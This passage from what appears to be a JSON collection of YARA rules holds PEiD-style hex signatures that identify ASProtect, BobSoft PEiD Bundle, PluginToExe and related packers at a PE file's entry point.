pe.entry_point\r\n\r\n}\r\nrule ASProtect_123_RC4_build_0807_exe_Alexey_Solodovnikov_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB ?? ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_11_BRS_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E9 ?? 
05 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v10_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 01 00 00 00 E8 83 C4 04 E8 01 00 00 00 E9 5D 81 ED D3 22 40 00 E8 04 02 00 00 E8 EB 08 EB 02 CD 20 FF 24 24 9A 66 BE 47 46 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v12x: PEiD\r\n{\r\n    strings:\r\n        $a = { 00 00 68 01 ?? ?? ?? C3 AA }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_V2X_DLL_Alexey_Solodovnikov_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 ?? ?? 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ?? ?? ?? ?? 03 DD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PseudoSigner_02_ASProtect: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 90 90 90 90 90 90 5D 90 90 90 90 90 90 90 90 90 90 90 03 DD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_21x_dll_Alexey_Solodovnikov_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PseudoSigner_02_ASProtect_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 90 90 90 90 90 90 5D 90 90 90 90 90 90 90 90 90 90 90 03 DD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_123_RC4_build_0807_dll_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 
80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_23_Alexey_Solodovnikov_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 E5 0B 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_21x_dll_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v11_MTE: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E9 ?? ?? ?? ?? 91 78 79 79 79 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v10: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 01 ?? ?? ?? 90 5D 81 ED ?? ?? ?? ?? BB ?? ?? ?? ?? 03 DD 2B 9D }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v11: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E9 ?? 04 ?? ?? E9 ?? ?? ?? ?? ?? ?? ?? 
EE }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v12: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 C3 AA ?? }\r\n        $b = { 68 01 ?? ?? ?? C3 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASProtect_v_If_you_know_this_version_post_on_PEiD_board_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? 00 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 DD 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_21x_exe_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n        $b = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB ?? ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASProtect_v12_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 1B 00 00 00 E9 FC 8D B5 0F 06 00 00 8B FE B9 97 00 00 00 AD 35 78 56 34 12 AB 49 75 F6 EB 04 5D 45 55 C3 E9 ?? ?? ?? 
00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_11_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E9 ?? 04 00 00 E9 ?? ?? ?? ?? ?? ?? ?? EE }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v12_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 ?? ?? 00 E8 01 00 00 00 C3 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_123_RC4_130824_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 ?? ?? 00 E8 01 00 00 00 C3 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v11_MTEc_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 33 C0 BE ?? ?? 8B D8 B9 ?? ?? BF ?? ?? BA ?? ?? 47 4A 74 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_2122_exe_Alexey_Solodovnikov_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_133_21_Registered_Alexey_Solodovnikov_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 ?? ?? ?? E8 01 00 00 00 C3 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_21x_exe_Alexey_Solodovnikov_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 
80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_123_RC4_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 F0 58 00 E8 01 00 00 00 C3 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_123_RC4_build_0807_dll_Alexey_Solodovnikov_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PseudoSigner_01_ASProtect_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 90 90 90 90 90 90 5D 90 90 90 90 90 90 90 90 90 90 90 03 DD E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_02_ASProtect_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 90 90 90 90 90 90 5D 90 90 90 90 90 90 90 90 90 90 90 03 DD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_122_123_Beta_21_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 E0 46 00 E8 01 00 00 00 C3 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v11_MTE_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E9 ?? ?? ?? ?? 91 78 79 79 79 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}"
        },
        {
            "id": 117,
            "key": "yara_detect_bobsoft",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "YARA_Detect_Bobsoft",
            "rule": "rule PEiD_Bundle_v100_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 21 02 00 00 8B 44 24 04 52 48 66 31 C0 66 81 38 4D 5A 75 F5 8B 50 3C 81 3C 02 50 45 00 00 75 E9 5A C2 04 00 60 89 DD 89 C3 8B 45 3C 8B 54 28 78 01 EA 52 8B 52 20 01 EA 31 C9 41 8B 34 8A }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PluginToExe_v101_BoB_BobSoft_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 00 00 00 00 29 C0 5D 81 ED C6 41 40 00 50 8F 85 71 40 40 00 50 FF 95 A5 41 40 00 89 85 6D 40 40 00 FF 95 A1 41 40 00 50 FF 95 B5 41 40 00 80 38 00 74 16 8A 08 80 F9 22 75 07 50 FF 95 B9 41 40 00 89 85 75 40 40 00 EB 6C 6A 01 8F 85 71 40 40 00 6A 58 6A }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Upx_Lock_10_12_CyberDoom_Team_X_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED 48 12 40 00 60 E8 2B 03 00 00 61 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_v102_v104_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 ?? ?? ?? 2E ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_v100_BoB_BobSoft_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 21 02 00 00 8B 44 24 04 52 48 66 31 C0 66 81 38 4D 5A 75 F5 8B 50 3C 81 3C 02 50 45 00 00 75 E9 5A C2 04 00 60 89 DD 89 C3 8B 45 3C 8B 54 28 78 01 EA 52 8B 52 20 01 EA 31 C9 41 8B 34 8A }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Splash_Bitmap_v100_With_Unpack_Code_BoB_Bobsoft: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 00 00 00 00 60 8B 6C 24 20 55 81 ED ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 29 F9 31 C0 FC F3 AA 8B 04 24 48 66 25 00 F0 66 81 38 4D 5A 75 F4 8B 48 3C 81 3C 01 50 45 00 00 75 E8 89 85 ?? ?? ?? ?? 
6A 40 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_v100_v101_BoB_BobSoft_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? 02 00 00 8B 44 24 04 52 48 66 31 C0 66 81 38 4D 5A 75 F5 8B 50 3C 81 3C 02 50 45 00 00 75 E9 5A C2 04 00 60 89 DD 89 C3 8B 45 3C 8B 54 28 78 01 EA 52 8B 52 20 01 EA 31 C9 41 8B 34 8A }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_V102_DLL_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 83 7C 24 08 01 0F 85 ?? ?? ?? ?? 60 E8 9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 41 00 08 00 39 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PluginToExe_v102_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 00 00 00 00 29 C0 5D 81 ED 32 42 40 00 50 8F 85 DD 40 40 00 50 FF 95 11 42 40 00 89 85 D9 40 40 00 FF 95 0D 42 40 00 50 FF 95 21 42 40 00 80 38 00 74 16 8A 08 80 F9 22 75 07 50 FF 95 25 42 40 00 89 85 E1 40 40 00 EB 6C 6A 01 8F 85 DD 40 40 00 6A 58 6A 40 FF 95 15 42 40 00 89 85 D5 40 40 00 89 C7 68 00 08 00 00 6A 40 FF 95 15 42 40 00 89 47 1C C7 07 58 00 }\r\n        $b = { E8 00 00 00 00 29 C0 5D 81 ED 32 42 40 00 50 8F 85 DD 40 40 00 50 FF 95 11 42 40 00 89 85 D9 40 40 00 FF 95 0D 42 40 00 50 FF 95 21 42 40 00 80 38 00 74 16 8A 08 80 F9 22 75 07 50 FF 95 25 42 40 00 89 85 E1 40 40 00 EB 6C 6A 01 8F 85 DD 40 40 00 6A 58 6A }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule PEiD_Bundle_v102_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 ?? ?? ?? 2E ?? ?? ?? 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_v104_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 ?? ?? ?? 2E ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_V101_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 23 02 00 00 8B 44 24 04 52 48 66 31 C0 66 81 38 4D 5A 75 F5 8B 50 3C 81 3C 02 50 45 00 00 75 E9 5A C2 04 00 60 89 DD 89 C3 8B 45 3C 8B 54 28 78 01 EA 52 8B 52 20 01 EA 31 C9 41 8B 34 8A }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_102_DLL_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 83 7C 24 08 01 0F 85 ?? ?? ?? ?? 60 E8 9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 41 00 08 00 39 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Imploder_v104_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 ?? ?? ?? 2E ?? ?? ?? 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_v101_BoB_BobSoft_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 23 02 00 00 8B 44 24 04 52 48 66 31 C0 66 81 38 4D 5A 75 F5 8B 50 3C 81 3C 02 50 45 00 00 75 E9 5A C2 04 00 60 89 DD 89 C3 8B 45 3C 8B 54 28 78 01 EA 52 8B 52 20 01 EA 31 C9 41 8B 34 8A }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_V100_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 21 02 00 00 8B 44 24 04 52 48 66 31 C0 66 81 38 4D 5A 75 F5 8B 50 3C 81 3C 02 50 45 00 00 75 E9 5A C2 04 00 60 89 DD 89 C3 8B 45 3C 8B 54 28 78 01 EA 52 8B 52 20 01 EA 31 C9 41 8B 34 8A }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_V102_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 ?? ?? ?? 2E ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PluginToExe_v101_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 00 00 00 00 29 C0 5D 81 ED C6 41 40 00 50 8F 85 71 40 40 00 50 FF 95 A5 41 40 00 89 85 6D 40 40 00 FF 95 A1 41 40 00 50 FF 95 B5 41 40 00 80 38 00 74 16 8A 08 80 F9 22 75 07 50 FF 95 B9 41 40 00 89 85 75 40 40 00 EB 6C 6A 01 8F 85 71 40 40 00 6A 58 6A 40 FF 95 A9 41 40 00 89 85 69 40 40 00 89 C7 68 00 08 00 00 6A 40 FF 95 A9 41 40 00 89 47 1C C7 07 58 00 00 00 C7 47 20 00 08 00 00 C7 47 18 01 00 00 00 C7 47 34 04 10 88 00 8D 8D B9 40 40 00 89 4F 0C 8D 8D DB 40 40 00 89 4F 30 FF B5 69 40 40 00 FF 95 95 41 40 00 FF 77 1C 8F 85 75 40 40 00 8B 9D 6D 40 40 00 60 6A 00 6A 01 53 81 C3 ?? ?? ?? 00 FF D3 61 6A 00 68 44 69 45 50 FF B5 75 40 40 00 6A 00 81 C3 ?? ?? 
00 00 FF D3 83 C4 10 83 BD 71 40 40 00 00 74 10 FF 77 1C FF 95 AD 41 40 00 57 FF 95 AD 41 40 00 6A 00 FF 95 9D 41 40 00 }\r\n        $b = { E8 00 00 00 00 29 C0 5D 81 ED C6 41 40 00 50 8F 85 71 40 40 00 50 FF 95 A5 41 40 00 89 85 6D 40 40 00 FF 95 A1 41 40 00 50 FF 95 B5 41 40 00 80 38 00 74 16 8A 08 80 F9 22 75 07 50 FF 95 B9 41 40 00 89 85 75 40 40 00 EB 6C 6A 01 8F 85 71 40 40 00 6A 58 6A }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule BobPack_v100_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 8B 0C 24 89 CD 83 E9 06 81 ED ?? ?? ?? ?? E8 3D 00 00 00 89 85 ?? ?? ?? ?? 89 C2 B8 5D 0A 00 00 8D 04 08 E8 E4 00 00 00 8B 70 04 01 D6 E8 76 00 00 00 E8 51 01 00 00 E8 01 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule BobSoft_Mini_Delphi_BoB_BobSoft_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 55 8B EC 83 C4 F0 B8 ?? ?? ?? ?? E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule BobSoft_Mini_Delphi_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 55 8B EC 83 C4 F0 53 56 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_v100_v101_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? 02 00 00 8B 44 24 04 52 48 66 31 C0 66 81 38 4D 5A 75 F5 8B 50 3C 81 3C 02 50 45 00 00 75 E9 5A C2 04 00 60 89 DD 89 C3 8B 45 3C 8B 54 28 78 01 EA 52 8B 52 20 01 EA 31 C9 41 8B 34 8A }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule BobPack_v100_BoB_BobSoft_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 8B 0C 24 89 CD 83 E9 06 81 ED ?? ?? ?? ?? E8 3D 00 00 00 89 85 ?? ?? ?? ?? 
89 C2 B8 5D 0A 00 00 8D 04 08 E8 E4 00 00 00 8B 70 04 01 D6 E8 76 00 00 00 E8 51 01 00 00 E8 01 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PluginToExe_v102_BoB_BobSoft_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 00 00 00 00 29 C0 5D 81 ED 32 42 40 00 50 8F 85 DD 40 40 00 50 FF 95 11 42 40 00 89 85 D9 40 40 00 FF 95 0D 42 40 00 50 FF 95 21 42 40 00 80 38 00 74 16 8A 08 80 F9 22 75 07 50 FF 95 25 42 40 00 89 85 E1 40 40 00 EB 6C 6A 01 8F 85 DD 40 40 00 6A 58 6A }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_v101_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 23 02 00 00 8B 44 24 04 52 48 66 31 C0 66 81 38 4D 5A 75 F5 8B 50 3C 81 3C 02 50 45 00 00 75 E9 5A C2 04 00 60 89 DD 89 C3 8B 45 3C 8B 54 28 78 01 EA 52 8B 52 20 01 EA 31 C9 41 8B 34 8A }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Splash_Bitmap_v100_BoB_Bobsoft: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 00 00 00 00 60 8B 6C 24 20 55 81 ED ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 29 F9 31 C0 FC F3 AA 8B 04 24 48 66 25 00 F0 66 81 38 4D 5A 75 F4 8B 48 3C 81 3C 01 50 45 00 00 75 E8 89 85 ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 6A 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Upx_Lock_10_12_CyberDoom_Team_X_BoB_BobSoft_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED 48 12 40 00 60 E8 2B 03 00 00 61 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PluginToExe_v100_BoB_BobSoft_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 00 00 00 00 29 C0 5D 81 ED D1 40 40 00 50 FF 95 B8 40 40 00 89 85 09 40 40 00 FF 95 B4 40 40 00 89 85 11 40 40 00 50 FF 95 C0 40 40 00 8A 08 80 F9 22 75 07 50 FF 95 C4 40 40 00 89 85 0D 40 40 00 8B 9D 09 40 40 00 60 6A 00 6A 01 53 81 C3 ?? ?? ?? 
00 FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_v102_v103_DLL_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 83 7C 24 08 01 0F 85 ?? ?? ?? ?? 60 E8 9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 41 00 08 00 39 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PluginToExe_v100_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 00 00 00 00 29 C0 5D 81 ED D1 40 40 00 50 FF 95 B8 40 40 00 89 85 09 40 40 00 FF 95 B4 40 40 00 89 85 11 40 40 00 50 FF 95 C0 40 40 00 8A 08 80 F9 22 75 07 50 FF 95 C4 40 40 00 89 85 0D 40 40 00 8B 9D 09 40 40 00 60 6A 00 6A 01 53 81 C3 ?? ?? ?? 00 FF D3 61 6A 00 68 44 69 45 50 FF B5 0D 40 40 00 6A 00 81 C3 ?? ?? ?? 00 FF D3 83 C4 10 FF 95 B0 40 40 00 }\r\n        $b = { E8 00 00 00 00 29 C0 5D 81 ED D1 40 40 00 50 FF 95 B8 40 40 00 89 85 09 40 40 00 FF 95 B4 40 40 00 89 85 11 40 40 00 50 FF 95 C0 40 40 00 8A 08 80 F9 22 75 07 50 FF 95 C4 40 40 00 89 85 0D 40 40 00 8B 9D 09 40 40 00 60 6A 00 6A 01 53 81 C3 ?? ?? ?? 00 FF }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule PEiD_Bundle_v102_v103_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 ?? ?? ?? 2E ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 